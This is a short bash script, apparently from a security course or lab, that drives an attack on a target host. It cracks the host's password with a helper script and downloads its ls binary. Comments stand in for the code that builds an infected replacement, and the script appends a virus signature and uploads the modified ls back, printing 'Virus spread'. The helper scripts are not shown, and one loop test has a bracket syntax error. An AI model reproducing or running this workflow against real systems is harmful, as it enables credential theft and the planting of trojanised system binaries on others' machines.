#!/bin/bash
sig="\xaa\xbb\xcc\xdd"

chmod +x crack_passwd.py download_ls.py upload_ls.py
./crack_passwd.py $1
# Make sure the password is cracked
while [ ! -f ./password]; do
    ./crack_passwd.py $1
done
password=`cat ./password`
echo "Password cracked: $password"

./download_ls.py $1
zip ls.zip orgi_ls
echo "File compressed"

####execute C to generate new ls
####padding
printf $sig >> ./ls # Signature
echo "Virus spread"

./upload_ls.py $1
echo "File sent"
